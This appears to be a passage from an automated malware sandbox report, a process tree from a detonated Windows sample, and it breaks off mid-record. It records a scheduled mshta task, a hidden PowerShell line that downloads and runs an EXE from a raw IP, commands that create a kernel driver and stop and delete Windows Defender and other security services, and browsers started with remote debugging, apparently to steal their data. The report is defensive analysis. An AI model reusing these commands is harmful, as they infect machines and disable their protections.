Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn RU1nWmal5Hr /tr "mshta C:\Users\Admin\AppData\Local\Temp\aLmPyaaCQ.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn RU1nWmal5Hr /tr "mshta C:\Users\Admin\AppData\Local\Temp\aLmPyaaCQ.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:5476
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\aLmPyaaCQ.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'M5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4612
  - - C:\Users\Admin\AppData\Local\TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE
      "C:\Users\Admin\AppData\Local\TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4192
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:408
      - C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1228
        
        C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2608
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9143.tmp\9144.tmp\9145.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:832
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\91B1.tmp\91B2.tmp\91B3.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:2688
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:1476
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:624
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:1612
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:1068
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:3112
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2932
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5660
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2524
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:1840
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:2960
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1928
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:5744
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:5956
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:2504
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5796
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:4560
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:2604
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:1748
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:6008
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:1272
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3668
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:3564
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:5804
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:5348
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:4072
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5492
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5284
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:5588
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:5860
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:1152
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:2020
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:5976
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:6016
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:4132
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:5428
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:1376
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:3932
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:5504
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:5316
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:3308
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:5256
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4424
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:4452
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:2744
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:1692
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:5332
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:6084
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3476
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:1180
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:6092
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4616
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:4352
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:1608
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:1776
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:5996
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:3340
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:4404
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:5204
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:5232
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:1344
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:5212
      - C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4848
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1596
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd4a97dcf8,0x7ffd4a97dd04,0x7ffd4a97dd10
        9⤵
        
        PID:4880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2000,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2092 /prefetch:3
        9⤵
        
        PID:4640
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2052,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2060 /prefetch:2
        9⤵
        
        PID:4860
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2560 /prefetch:8
        9⤵
        
        PID:6128
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3212 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5032
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3216 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4108,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4132 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:3556
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4728,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4704 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5020,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5048 /prefetch:8
        9⤵
        
        PID:5976
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5048,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5412 /prefetch:8
        9⤵
        
        PID:5256
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5076,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5640 /prefetch:8
        9⤵
        
        PID:5632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5404,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5676 /prefetch:8
        9⤵
        
        PID:4616
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5656,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5052 /prefetch:8
        9⤵
        
        PID:1776
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5572,i,9234267133844806678,16018680481932896844,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5688 /prefetch:8
        9⤵
        
        PID:2372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:5500
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7ffd49e7f208,0x7ffd49e7f214,0x7ffd49e7f220
        9⤵
        
        PID:392
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1968,i,15946778709399516096,10834260382698927471,262144 --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:3
        9⤵
        
        PID:5044
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2220,i,15946778709399516096,10834260382698927471,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:2
        9⤵
        
        PID:1564
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2552,i,15946778709399516096,10834260382698927471,262144 --variations-seed-version --mojo-platform-channel-handle=2724 /prefetch:8
        9⤵
        
        PID:384
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3576,i,15946778709399516096,10834260382698927471,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3580,i,15946778709399516096,10834260382698927471,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3240
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\q9h4w" & exit
        8⤵
        
        PID:5964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        9⤵
        Delays execution with timeout.exe
        
        PID:2040
      - C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
        8⤵
        
        PID:4148
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        
        PID:2996
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5972
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:4528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd4a5ddcf8,0x7ffd4a5ddd04,0x7ffd4a5ddd10
        11⤵
        
        PID:6092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1852,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2212 /prefetch:3
        11⤵
        
        PID:5944
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2160,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2244 /prefetch:8
        11⤵
        
        PID:3088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2184,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2156 /prefetch:2
        11⤵
        
        PID:3504
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3228,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3308 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:5932
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3236,i,2981307926776337166,5360512809191076691,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3328 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:4092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
